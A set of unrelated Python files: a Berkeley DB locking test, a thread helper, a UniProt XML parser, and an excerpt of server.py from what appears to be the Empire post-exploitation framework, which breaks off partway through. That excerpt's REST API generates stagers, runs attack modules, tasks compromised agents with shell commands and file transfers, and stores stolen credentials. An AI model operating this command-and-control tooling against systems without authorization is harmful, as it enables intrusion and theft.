threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
for t in threads:
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in threads:
t.join()
if db.version() >= (4, 2) :
def test03_lock_timeout(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 0)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 0)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 123456)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 7890123)
def test04_lock_timeout2(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
def deadlock_detection() :
while not deadlock_detection.end :
deadlock_detection.count = \
self.env.lock_detect(db.DB_LOCK_EXPIRE)
if deadlock_detection.count :
while not deadlock_detection.end :
pass
break
time.sleep(0.01)
deadlock_detection.end=False
deadlock_detection.count=0
t=Thread(target=deadlock_detection)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.env.set_timeout(100000, db.DB_SET_LOCK_TIMEOUT)
anID = self.env.lock_id()
anID2 = self.env.lock_id()
self.assertNotEqual(anID, anID2)
lock = self.env.lock_get(anID, "shared lock", db.DB_LOCK_WRITE)
start_time=time.time()
self.assertRaises(db.DBLockNotGrantedError,
self.env.lock_get,anID2, "shared lock", db.DB_LOCK_READ)
end_time=time.time()
deadlock_detection.end=True
self.assertTrue((end_time-start_time) >= 0.1)
self.env.lock_put(lock)
t.join()
self.env.lock_id_free(anID)
self.env.lock_id_free(anID2)
if db.version() >= (4,6):
self.assertTrue(deadlock_detection.count>0)
def theThread(self, lockType):
import sys
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
if lockType == db.DB_LOCK_WRITE:
lt = "write"
else:
lt = "read"
anID = self.env.lock_id()
if verbose:
print("%s: locker ID: %s" % (name, anID))
for i in range(1000) :
lock = self.env.lock_get(anID, "some locked thing", lockType)
if verbose:
print("%s: Aquired %s lock: %s" % (name, lt, lock))
self.env.lock_put(lock)
if verbose:
print("%s: Released %s lock: %s" % (name, lt, lock))
self.env.lock_id_free(anID)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if have_threads:
suite.addTest(unittest.makeSuite(LockingTestCase))
else:
suite.addTest(unittest.makeSuite(LockingTestCase, 'test01'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
thread.py
|
__author__ = 'tinglev@kth.se'
from threading import Thread, Event, current_thread
import threading
class SyncThread(Thread):
def __init__(self, target):
super(SyncThread, self).__init__(target=target, name='SyncThread')
self._stop_event = Event()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
def thread_is_stoppped():
if current_thread().name == 'SyncThread':
this_thread = current_thread()
return this_thread.stopped()
return False
def get_sync_thread():
for thread in threading.enumerate():
if thread.name == 'SyncThread':
return thread
return None
def create_and_start_sync_thread(sync_routine):
if not get_sync_thread():
sync_thread = SyncThread(target=sync_routine)
sync_thread.daemon = True
sync_thread.start()
|
uniprot_master_parser.py
|
"""
This file parses the uniprot FTP file and can do various things. such as making a small one that is only human.
But mainly the `UniprotMasterReader.convert('uniprot_sprot.xml')` method whcih generates the JSON files required. In future these will be databases...
Be warned that ET.Element is a monkeypatched version.
"""
import os, json, re, time
from threading import Thread, Semaphore, Lock, active_count
import itertools
from .ET_monkeypatch import ET
from ._protein_gatherer import ProteinGatherer as Protein
from warnings import warn
from michelanglo_protein.generate.old_split_gnomAD import gnomAD
from collections import defaultdict
### Uniprot reader
class UniprotMasterReader:
"""
see generator iter_human
NB. The ET.Element has been expanded. See `help(ElementalExpansion)`
"""
def iter_human(self):
"""
Interates across a LARGE Uniprot XML file and returns *only* the humans.
:return: ET.Element()
"""
for event, elem in ET.iterparse(self.file, events=('end',)):
if elem is not None and isinstance(elem, ET.Element):
if elem.ns_strip() == 'entry':
if elem.is_human():
yield elem
elem.clear()
def iter_all(self, dataset=None):
"""
dataset = Swiss-Prot is better than TrEMBL
Interates across a LARGE Uniprot XML file and returns entries regardless of humanity.
:return: ET.Element()
"""
count = 0
for event, elem in ET.iterparse(self.file, events=('end',)):
if elem is not None and isinstance(elem, ET.Element):
if elem.ns_strip() == 'entry':
if dataset and dataset != elem.get_attr('dataset'):
continue
count += 1
if count == self.first_n_protein:
break
yield elem
elem.clear()
def shrink(self, outfile='human_proteome.xml'):
"""
Make a smaller XML file, but with only the human proteome.
:param outfile:
:return:
"""
with open(outfile, 'wb') as proteo:
proteo.write(
b'<?xml version="1.0" encoding="UTF-8"?><uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' +
b'xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/docs/uniprot.xsd">')
for entry in self.iter_human():
proteo.write(ET.tostring(entry))
proteo.write(b'</uniprot>')
def parse_human(self):
return [Protein(entry) for entry in self.iter_human()]
@classmethod
def convert(cls, uniprot_master_file=None, first_n_protein=0):
"""
DO NOT USE!!!
:param uniprot_master_file:
:param first_n_protein: set to zero for all, to interger to get the first n.
:return:
"""
raise DeprecationWarning('DO NOT USE!')
if uniprot_master_file is None:
uniprot_master_file = os.path.join(Protein.settings.reference_folder, 'uniprot_sprot.xml')
Protein.settings.retrieve_references(ask = True)
count=0
greater_namedex = {}
lesser_namedex = {}
seqdex = {}
genedex = {}
for entry in cls(uniprot_master_file).iter_human():
count+=1
if count == first_n_protein:
break
prot = Protein.from_uniprot(entry)
chosen_name = prot.accession_list[0] #ideally prot.uniprot_name or the first acc id. But for code usage going for gene name.
# fill namedex
greater_namedex[prot.uniprot_name] = chosen_name
greater_namedex[prot.recommended_name] = chosen_name
greater_namedex[prot.gene_name] = chosen_name
for group in [prot.alt_gene_name_list, prot.alternative_fullname_list, prot.alternative_shortname_list]:
for name in group:
if re.match('[\d\-]+\.[\d\-]+\.[\d\-]+\.[\d\-]+',name):
continue # no EC numbers!
lesser_namedex[name] = chosen_name
# fill seqdex
seqdex[chosen_name] = prot.sequence
genedex[chosen_name] = prot.gene_name
# save
prot.write_uniprot(os.path.join(Protein.settings.uniprot_folder, chosen_name+'_uniprot.xml'))
# prot.
namedex = {**lesser_namedex, **greater_namedex}
# cleanup
for k in ('\n ', '\n ', '\n ', '\n ', '', '\n', ' '):
if k in namedex:
del namedex[k]
json.dump(namedex, open(os.path.join(Protein.settings.data_folder, 'human_prot_namedex.json'), 'w')) # name to uniprot
#json.dump(genedex, open(os.path.join(Protein.settings.temp_folder, 'human_prot_genedex.json'), 'w')) # uniprot to name. not needed.
#json.dump(seqdex, open(os.path.join(Protein.settings.temp_folder, 'human_prot_seqdex.json'), 'w')) # not needed.
open(os.path.join(Protein.settings.temp_folder, 'human.fa'), 'w').writelines(['>{i}\n{s}\n\n'.format(s=seqdex[k], i=k) for k in seqdex])
def __init__(self, uniprot_master_file=None, first_n_protein=0, chosen_attribute='uniprot'):
"""
THIS IS FOR MICHELANGLO
:param uniprot_master_file:
:param first_n_protein: set to zero for all, to interger to get the first n.
:return:
"""
if uniprot_master_file is None:
uniprot_master_file = os.path.join(Protein.settings.reference_folder, 'uniprot_sprot.xml')
#Protein.settings.retrieve_references(ask=False)
if not os.path.exists(os.path.join(Protein.settings.data_folder, 'gnomAD')):
#gnomAD().split().write('gnomAD')
warn('I turned off this step!!!')
self.file = uniprot_master_file
self.first_n_protein = first_n_protein
self.chosen_attribute = chosen_attribute
self._uniprot_pdbdex = defaultdict(list) #: dict of key=uniprot and value=list of PDB codes
self._uniprot_datasetdex = defaultdict(str) #: dict of key=uniprot and value=dataset type Swiss-Prot | TrEMBL
self._organism_greater_namedex = defaultdict(dict) #: dict of taxid as keys, with dict value with keys names and values prefered name (uniprot id) for the good names
self._organism_lesser_namedex = defaultdict(dict) #: dict of taxid as keys, with dict value with keys names and values prefered name (uniprot id) for the potentially stinky names
self._uniprot_namedex = {} #: dict of key=uniprot and value=human name for title
self._uniprot_speciesdex = {} #: dict of key=uniprot and value=taxid
self._organismdex = {} #: dict of key=orgnism names and value=taxid
self._semaphore = Semaphore(50)
self._lock = Lock()
idleness = active_count()
# preload some steps to speed up
with Protein.settings.open('resolution') as fh:
resolutions = {entry['IDCODE']: float(entry['RESOLUTION']) for entry in json.load(fh) if
entry['RESOLUTION'].strip()}
self.resolutions = resolutions
# run
for entry in self.iter_all():
Thread(target=self.parse, args=[entry]).start()
while active_count() > 50:
time.sleep(1)
while active_count() > idleness: #no idea why it is two not one...
print('DEBUG: waiting...', active_count(), idleness)
print(self._lock)
print(self._semaphore)
time.sleep(1)
# final touches to the whole sets...
for org in list(self._organism_greater_namedex.keys()):
namedex = {**self._organism_lesser_namedex[org], **self._organism_greater_namedex[org]}
# cleanup
for k in ('\n ', '\n ', '\n ', '\n ', '', '\n', ' '):
if k in namedex:
del namedex[k]
#namedex = {k.lower(): namedex[k] for k in namedex}
fn = os.path.join(Protein.settings.dictionary_folder, f'taxid{org}-names2{chosen_attribute}.json')
json.dump(namedex, open(fn, 'w')) # name to pdbs
fn = os.path.join(Protein.settings.dictionary_folder, f'organism.json')
json.dump(self._organismdex, open(fn, 'w')) # organism to taxid
# lighten
for dex, fn in ((self._uniprot_pdbdex, 'uniprot2pdb.json'),
(self._uniprot_namedex, 'uniprot2name.json'),
(self._uniprot_speciesdex, 'uniprot2species.json')):
fp = os.path.join(Protein.settings.dictionary_folder, fn)
json.dump({k: dex[k] for k in dex if dex[k]}, open(fp, 'w'))
def parse(self, entry):
## parser...
#print('waiting for semaphore')
self._semaphore.acquire()
#print('waited for semaphore')
prot = Protein.from_uniprot(entry)
if prot.uniprot in self._uniprot_datasetdex:
#print('Repeated uniprot!', prot.uniprot)
self._semaphore.release()
return None
#print('getting offsets')
prot.get_offsets()
#.get_resolutions() too slow.
self.get_resolutions_for_prot(prot)
if prot.organism['common'] == 'Human':
prot.parse_swissmodel()
pass
prot.compute_params()
## dict
chosen_name = getattr(prot, self.chosen_attribute)
# update the organism dex
org = prot.organism['NCBI Taxonomy']
#print('waiting for lock')
self._lock.acquire()
#print('waited for lock')
try:
prot.dump() # gdump??
#print('dumping')
if org not in self._organismdex:
for k in prot.organism:
self._organismdex[prot.organism[k]] = org
# make dictionaries...
self._uniprot_datasetdex[prot.uniprot] = prot.uniprot_dataset
self._uniprot_pdbdex[prot.uniprot].extend([p.id for p in prot.pdbs])
if prot.gene_name and prot.gene_name in self._organism_greater_namedex[org]:
if prot.organism['scientific'] == 'Homo sapiens':
print('#' * 20)
print('CLASH!!!!!', prot.gene_name, prot.uniprot, prot.organism['scientific'],
prot.recommended_name,
self._uniprot_datasetdex[prot.uniprot],
self._uniprot_datasetdex[self._organism_greater_namedex[org][prot.gene_name]])
if prot.uniprot_dataset == 'TrEMBL' and self._uniprot_datasetdex[
self._organism_greater_namedex[org][prot.gene_name]] == 'Swiss-Prot':
self._lock.release()
return None
if prot.recommended_name and prot.recommended_name in self._organism_greater_namedex[org]:
if prot.organism['scientific'] == 'Homo sapiens':
print('#' * 20)
print('CLASH!!!!!', prot.gene_name, prot.uniprot, prot.recommended_name,
self._uniprot_datasetdex[prot.uniprot],
self._uniprot_datasetdex[self._organism_greater_namedex[org][prot.recommended_name]])
if prot.uniprot_dataset == 'TrEMBL' and self._uniprot_datasetdex[
self._organism_greater_namedex[org][prot.recommended_name]] == 'Swiss-Prot':
self._lock.release()
return None
self._organism_greater_namedex[org][prot.uniprot] = chosen_name
self._organism_greater_namedex[org][prot.uniprot_name] = chosen_name
self._organism_greater_namedex[org][prot.recommended_name] = chosen_name
self._organism_greater_namedex[org][prot.gene_name] = chosen_name
self._uniprot_namedex[prot.uniprot] = prot.recommended_name
self._uniprot_speciesdex[prot.uniprot] = org
for group in [prot.alt_gene_name_list, prot.alternative_fullname_list, prot.alternative_shortname_list]:
for name in group:
if re.match('[\d\-]+\.[\d\-]+\.[\d\-]+\.[\d\-]+', name):
continue # no EC numbers!
self._organism_lesser_namedex[org][name] = chosen_name
self._lock.release()
self._semaphore.release()
#print(prot.uniprot)
return None
except Exception as error:
print(error.__class__.__name__, str(error))
self._lock.release()
self._semaphore.release()
def get_resolutions_for_prot(self, prot):
# modified from lookup_resolution
for pdb in prot.pdbs:
if pdb.type != 'rcsb':
pass
elif pdb.code in self.resolutions:
pdb.resolution = self.resolutions[pdb.code]
else:
warn(f'No resolution info for {pdb.code}')
|
server.py
|
#!/usr/bin/env python3
from __future__ import print_function
import base64
import copy
import hashlib
import json
import logging
import os
import pkgutil
import random
import signal
import ssl
import string
import subprocess
import sys
import time
from typing import List
import urllib3
import requests
import socketio
from datetime import datetime, timezone
from time import sleep
import flask
from flask import Flask, request, jsonify, make_response, abort, g
from flask.json import JSONEncoder
from flask_socketio import SocketIO, join_room, leave_room
from sqlalchemy import and_, or_
from sqlalchemy.orm import aliased, joinedload, undefer
# Empire imports
from empire.server.common import empire, helpers
from empire.server.common.empire import MainMenu
from empire.server.common.module_models import PydanticModule
from empire.server.database.base import Session
from empire.server.database import models
from empire.server.common.config import empire_config
# Check if running Python 3
if sys.version[0] == '2':
print(helpers.color("[!] Please use Python 3"))
sys.exit()
global serverExitCommand
serverExitCommand = 'restart'
# Disable flask warning banner for development server in production environment
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
# Disable http warnings
if empire_config.yaml.get('suppress-self-cert-warning', True):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Set proxy IDs
PROXY_NAME = {
"SOCKS4": 1,
"SOCKS5": 2,
"HTTP": 3,
"SSL": 4,
"SSL_WEAK": 5,
"SSL_ANON": 6,
"TOR": 7,
"HTTPS": 8,
"HTTP_CONNECT": 9,
"HTTPS_CONNECT": 10
}
PROXY_IDS = {}
for name, ID in list(PROXY_NAME.items()): PROXY_IDS[ID] = name
#####################################################
#
# Database interaction methods for the RESTful API
#
#####################################################
class MyJsonEncoder(JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return o.isoformat()
if isinstance(o, bytes):
return o.decode('latin-1')
return super().default(o)
####################################################################
#
# The Empire RESTful API. To see more information about it, check out the official wiki.
#
# Adapted from http://blog.miguelgrinberg.com/post/designing-a-restful-api-with-python-and-flask.
# Example code at https://gist.github.com/miguelgrinberg/5614326.
#
#
# Verb URI Action
# ---- --- ------
# GET http://localhost:1337/api/version return the current Empire version
# GET http://localhost:1337/api/map return list of all API routes
# GET http://localhost:1337/api/config return the current default config
#
# GET http://localhost:1337/api/stagers return all current stagers
# GET http://localhost:1337/api/stagers/X return the stager with name X
# POST http://localhost:1337/api/stagers generate a stager given supplied options (need to implement)
#
# GET http://localhost:1337/api/modules return all current modules
# GET http://localhost:1337/api/modules/<name> return the module with the specified name
# POST http://localhost:1337/api/modules/<name> execute the given module with the specified options
# POST http://localhost:1337/api/modules/search searches modulesfor a passed term
# POST http://localhost:1337/api/modules/search/modulename searches module names for a specific term
# POST http://localhost:1337/api/modules/search/description searches module descriptions for a specific term
# POST http://localhost:1337/api/modules/search/comments searches module comments for a specific term
# POST http://localhost:1337/api/modules/search/author searches module authors for a specific term
#
# GET http://localhost:1337/api/listeners return all current listeners
# GET http://localhost:1337/api/listeners/Y return the listener with id Y
# DELETE http://localhost:1337/api/listeners/Y kills listener Y
# GET http://localhost:1337/api/listeners/types returns a list of the loaded listeners that are available for use
# GET http://localhost:1337/api/listeners/options/Y return listener options for Y
# POST http://localhost:1337/api/listeners/Y starts a new listener with the specified options
#
# GET http://localhost:1337/api/agents return all current agents
# GET http://localhost:1337/api/agents/stale return all stale agents
# DELETE http://localhost:1337/api/agents/stale removes stale agents from the database
# DELETE http://localhost:1337/api/agents/Y removes agent Y from the database
# GET http://localhost:1337/api/agents/Y return the agent with name Y
# GET http://localhost:1337/api/agents/Y/directory return the directory with the name given by the query parameter 'directory'
# POST http://localhost:1337/api/agents/Y/directory task the agent Y to scrape the directory given by the query parameter 'directory'
# GET http://localhost:1337/api/agents/Y/results return tasking results for the agent with name Y
# DELETE http://localhost:1337/api/agents/Y/results deletes the result buffer for agent Y
# GET http://localhost:1337/api/agents/Y/task/Z return the tasking Z for agent Y
# POST http://localhost:1337/api/agents/Y/download task agent Y to download a file
# POST http://localhost:1337/api/agents/Y/upload task agent Y to upload a file
# POST http://localhost:1337/api/agents/Y/shell task agent Y to execute a shell command
# POST http://localhost:1337/api/agents/Y/rename rename agent Y
# GET/POST http://localhost:1337/api/agents/Y/clear clears the result buffer for agent Y
# GET/POST http://localhost:1337/api/agents/Y/kill kill agent Y
#
# GET http://localhost:1337/api/creds return stored credentials
# POST http://localhost:1337/api/creds add creds to the database
#
# GET http://localhost:1337/api/reporting return all logged events
# GET http://localhost:1337/api/reporting/agent/X return all logged events for the given agent name X
# GET http://localhost:1337/api/reporting/type/Y return all logged events of type Y (checkin, task, result, rename)
# GET http://localhost:1337/api/reporting/msg/Z return all logged events matching message Z, wildcards accepted
#
#
# POST http://localhost:1337/api/admin/login retrieve the API token given the correct username and password
# POST http://localhost:1337/api/admin/logout logout of current user account
# GET http://localhost:1337/api/admin/restart restart the RESTful API
# GET http://localhost:1337/api/admin/shutdown shutdown the RESTful API
#
# GET http://localhost:1337/api/users return all users from database
# GET http://localhost:1337/api/users/X return the user with id X
# GET http://localhost:1337/api/users/me return the user for the given token
# POST http://localhost:1337/api/users add a new user
# PUT http://localhost:1337/api/users/Y/disable disable/enable user Y
# PUT http://localhost:1337/api/users/Y/updatepassword update password for user Y
#
####################################################################
def start_restful_api(empireMenu: MainMenu, suppress=False, headless=False, username=None, password=None, ip='0.0.0.0',
port=1337):
"""
Kick off the RESTful API with the given parameters.
empireMenu - Main empire menu object
suppress - suppress most console output
username - optional username to use for the API, otherwise pulls from the empire.db config
password - optional password to use for the API, otherwise pulls from the empire.db config
ip - ip to bind the API to, defaults to 0.0.0.0
port - port to start the API on, defaults to 1337 ;)
"""
app = Flask(__name__)
app.json_encoder = MyJsonEncoder
main = empireMenu
global serverExitCommand
if username:
main.users.update_username(1, username[0])
if password:
main.users.update_password(1, password[0])
print(helpers.color("[*] Starting Empire RESTful API on %s:%s" % (ip, port)))
oldStdout = sys.stdout
if suppress:
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
if headless:
# suppress all stdout and don't initiate the main cmdloop
sys.stdout = open(os.devnull, 'w')
# validate API token before every request except for the login URI
@app.before_request
def check_token():
"""
Before every request, check if a valid token is passed along with the request.
"""
try:
if request.path != '/api/admin/login':
token = request.args.get('token')
if token and len(token) > 0:
user = main.users.get_user_from_token(token)
if user:
g.user = user
else:
return make_response('', 401)
else:
return make_response('', 401)
except:
return make_response('', 401)
@app.after_request
def add_cors(response):
response.headers['Access-Control-Allow-Origin'] = '*'
return response
@app.teardown_request
def remove_session(ex):
Session.remove()
@app.errorhandler(Exception)
def exception_handler(error):
"""
Generic exception handler.
"""
code = error.code if hasattr(error, 'code') else '500'
return make_response(jsonify({'error': repr(error)}), code)
@app.errorhandler(404)
def not_found(error):
"""
404/not found handler.
"""
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/api/version', methods=['GET'])
def get_version():
"""
Returns the current Empire version.
"""
return jsonify({'version': empire.VERSION})
@app.route('/api/map', methods=['GET'])
def list_routes():
"""
List all of the current registered API routes.
"""
output = {}
for rule in app.url_map.iter_rules():
methods = ','.join(rule.methods)
url = rule.rule
output.update({rule.endpoint: {'methods': methods, 'url': url}})
return jsonify({'Routes': output})
@app.route('/api/config', methods=['GET'])
def get_config():
"""
Returns JSON of the current Empire config.
"""
api_username = g.user['username']
api_current_token = g.user['api_token']
config = Session().query(models.Config).first()
dictret = dict(config.__dict__);
dictret.pop('_sa_instance_state', None)
dictret['api_username'] = api_username
dictret['current_api_token'] = api_current_token
dictret['version'] = empire.VERSION
return jsonify({"config": dictret})
@app.route('/api/stagers', methods=['GET'])
def get_stagers():
"""
Returns JSON describing all stagers.
"""
stagers = []
for stager_name, stager in main.stagers.stagers.items():
info = copy.deepcopy(stager.info)
info['options'] = stager.options
info['Name'] = stager_name
stagers.append(info)
return jsonify({'stagers': stagers})
@app.route('/api/stagers/<path:stager_name>', methods=['GET'])
def get_stagers_name(stager_name):
"""
Returns JSON describing the specified stager_name passed.
"""
if stager_name not in main.stagers.stagers:
return make_response(jsonify({
'error': 'stager name %s not found, make sure to use [os]/[name] format, ie. windows/dll' % (
stager_name)}), 404)
stagers = []
stager = main.stagers.stagers[stager_name]
info = copy.deepcopy(stager.info)
info['options'] = stager.options
info['Name'] = stager_name
stagers.append(info)
return jsonify({'stagers': stagers})
@app.route('/api/stagers', methods=['POST'])
def generate_stager():
"""
Generates a stager with the supplied config and returns JSON information
describing the generated stager, with 'Output' being the stager output.
Required JSON args:
StagerName - the stager name to generate
Listener - the Listener name to use for the stager
"""
if not request.json or not 'StagerName' in request.json or not 'Listener' in request.json:
abort(400)
stager_name = request.json['StagerName']
listener = request.json['Listener']
if stager_name not in main.stagers.stagers:
return make_response(jsonify({'error': 'stager name %s not found' % (stager_name)}), 404)
if not main.listeners.is_listener_valid(listener):
return make_response(jsonify({'error': 'invalid listener ID or name'}), 400)
stager = main.stagers.stagers[stager_name]
# set all passed options
for option, values in request.json.items():
if option != 'StagerName':
if option not in stager.options:
return make_response(jsonify({'error': 'Invalid option %s, check capitalization.' % (option)}), 400)
stager.options[option]['Value'] = values
# validate stager options
for option, values in stager.options.items():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
return make_response(jsonify({'error': 'required stager options missing'}), 400)
if values['Strict'] and values['Value'] not in values['SuggestedValues']:
return make_response(jsonify({'error': f'{option} must be set to one of the suggested values.'}))
stager_out = copy.deepcopy(stager.options)
if ('OutFile' in stager_out) and (stager_out['OutFile']['Value'] != ''):
if isinstance(stager.generate(), str):
# if the output was intended for a file, return the base64 encoded text
stager_out['Output'] = base64.b64encode(stager.generate().encode('UTF-8'))
else:
stager_out['Output'] = base64.b64encode(stager.generate())
else:
# otherwise return the text of the stager generation
stager_out['Output'] = stager.generate()
return jsonify({stager_name: stager_out})
@app.route('/api/modules', methods=['GET'])
def get_modules():
"""
Returns JSON describing all currently loaded modules.
"""
modules = []
for moduleName, module in main.modules.modules.items():
mod_dict = module.dict()
module_info = {'Name': moduleName,
'Author': mod_dict.get('authors'),
'Background': mod_dict.get('background'),
'Comments': mod_dict.get('comments'),
'Description': mod_dict.get('description'),
'Enabled': mod_dict.get('enabled'),
'Language': mod_dict.get('language'),
'MinLanguageVersion': mod_dict.get('min_language_version'),
'NeedsAdmin': mod_dict.get('needs_admin'),
'OpsecSafe': mod_dict.get('opsec_safe'),
'options': {x['name']: {'Description': x['description'],
'Required': x['required'],
'Value': x['value'],
'SuggestedValues': x['suggested_values'],
'Strict': x['strict']} for x in mod_dict.get('options')},
'OutputExtension': mod_dict.get('output_extension'),
'Software': mod_dict.get('software'),
'Techniques': mod_dict.get('techniques')}
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/modules/<path:module_name>', methods=['GET'])
def get_module_name(module_name):
"""
Returns JSON describing the specified currently module.
"""
if module_name not in main.modules.modules:
return make_response(jsonify({'error': 'module name %s not found' % (module_name)}), 404)
modules = []
mod_dict = main.modules.modules[module_name].dict()
module_info = {'Name': module_name,
'Author': mod_dict.get('authors'),
'Background': mod_dict.get('background'),
'Comments': mod_dict.get('comments'),
'Description': mod_dict.get('description'),
'Enabled': mod_dict.get('enabled'),
'Language': mod_dict.get('language'),
'MinLanguageVersion': mod_dict.get('min_language_version'),
'NeedsAdmin': mod_dict.get('needs_admin'),
'OpsecSafe': mod_dict.get('opsec_safe'),
'options': {x['name']: {'Description': x['description'],
'Required': x['required'],
'Value': x['value'],
'SuggestedValues': x['suggested_values'],
'Strict': x['strict']} for x in mod_dict.get('options')},
'OutputExtension': mod_dict.get('output_extension'),
'Software': mod_dict.get('software'),
'Techniques': mod_dict.get('techniques')}
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/modules/disable', methods=['POST'])
def disable_modules():
"""
Disable list of modules
"""
if not request.json or not 'module_list' in request.json:
abort(400)
module_list = request.json['module_list']
main.modules.change_module_state(main, module_list, False)
return jsonify({'success': True})
@app.route('/api/modules/enable', methods=['POST'])
def enable_modules():
"""
Enable list of modules
"""
if not request.json or not 'module_list' in request.json:
abort(400)
module_list = request.json['module_list']
main.modules.change_module_state(main, module_list, True)
return jsonify({'success': True})
@app.route('/api/modules/<path:module_name>', methods=['POST'])
def execute_module(module_name):
"""
Executes a given module name with the specified parameters.
"""
module: PydanticModule = main.modules.get_module(module_name)
if not module:
return make_response(jsonify({'error': f'module name {module_name} not found'}), 404)
result, err = main.modules.execute_module(module, params=request.json, user_id=g.user['id'])
if err:
return make_response(jsonify({'error': err}), 400)
return make_response(jsonify(result), 200)
@app.route('/api/modules/search', methods=['POST'])
def search_modules():
"""
Returns JSON describing the the modules matching the passed
'term' search parameter. Module name, description, comments,
and author fields are searched.
"""
if not request.json or not 'term':
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in moduleName.lower()) or (
search_term.lower() in ("".join(module.info['Description'])).lower()) or (
search_term.lower() in ("".join(module.info['Comments'])).lower()) or (
search_term.lower() in ("".join(module.info['Author'])).lower()):
moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info)
moduleInfo['options'] = main.modules.modules[moduleName].options
moduleInfo['Name'] = moduleName
modules.append(moduleInfo)
return jsonify({'modules': modules})
@app.route('/api/modules/search/modulename', methods=['POST'])
def search_modules_name():
"""
Returns JSON describing the the modules matching the passed
'term' search parameter for the modfule name.
"""
if not request.json or not 'term':
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in moduleName.lower()):
module_info = copy.deepcopy(main.modules.modules[moduleName].info)
module_info['options'] = main.modules.modules[moduleName].options
module_info['Name'] = moduleName
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/modules/search/description', methods=['POST'])
def search_modules_description():
"""
Returns JSON describing the the modules matching the passed
'term' search parameter for the 'Description' field.
"""
if not request.json or not 'term':
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in ("".join(module.info['Description'])).lower()):
moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info)
moduleInfo['options'] = main.modules.modules[moduleName].options
moduleInfo['Name'] = moduleName
modules.append(moduleInfo)
return jsonify({'modules': modules})
@app.route('/api/modules/search/comments', methods=['POST'])
def search_modules_comments():
"""
Returns JSON describing the the modules matching the passed
'term' search parameter for the 'Comments' field.
"""
if not request.json or not 'term':
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in ("".join(module.info['Comments'])).lower()):
module_info = copy.deepcopy(main.modules.modules[moduleName].info)
module_info['options'] = main.modules.modules[moduleName].options
module_info['Name'] = moduleName
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/modules/search/author', methods=['POST'])
def search_modules_author():
"""
Returns JSON describing the the modules matching the passed
'term' search parameter for the 'Author' field.
"""
if not request.json or not 'term':
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in ("".join(module.info['Author'])).lower()):
module_info = copy.deepcopy(main.modules.modules[moduleName].info)
module_info['options'] = main.modules.modules[moduleName].options
module_info['Name'] = moduleName
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/listeners', methods=['GET'])
def get_listeners():
"""
Returns JSON describing all currently registered listeners.
"""
active_listeners_raw = Session().query(models.Listener).all()
listeners = []
for active_listener in active_listeners_raw:
listeners.append({'ID': active_listener.id, 'name': active_listener.name, 'module': active_listener.module,
'listener_type': active_listener.listener_type,
'listener_category': active_listener.listener_category,
'options': active_listener.options,
'created_at': active_listener.created_at,
'enabled': active_listener.enabled})
return jsonify({"listeners": listeners})
@app.route('/api/listeners/<string:listener_type>/validate', methods=['POST'])
def validate_listeners(listener_type):
"""
Returns JSON describing all currently registered listeners.
"""
if listener_type.lower() not in main.listeners.loadedListeners:
return make_response(jsonify({'error': f"listener type {listener_type} not found"}), 404)
listener_object = main.listeners.loadedListeners[listener_type]
# set all passed options
for option, values in request.json.items():
if isinstance(values, bytes):
values = values.decode('UTF-8')
if option == "Name":
listener_name = values
return_options = main.listeners.set_listener_option(listener_type, option, values)
if not return_options:
return make_response(
jsonify({'error': 'error setting listener value %s with option %s' % (option, values)}), 400)
validation = listener_object.validate_options()
if validation == True:
return jsonify({'success': True})
elif not validation:
return jsonify({'error': 'failed to validate listener %s options' % listener_name})
else:
return jsonify({'error': validation})
@app.route('/api/listeners/<string:listener_name>', methods=['GET'])
def get_listener_name(listener_name):
"""
Returns JSON describing the listener specified by listener_name.
"""
active_listener = Session().query(models.Listener).filter(models.Listener.name == listener_name).first()
if not active_listener:
return make_response(jsonify({'error': 'listener name %s not found' % listener_name}), 404)
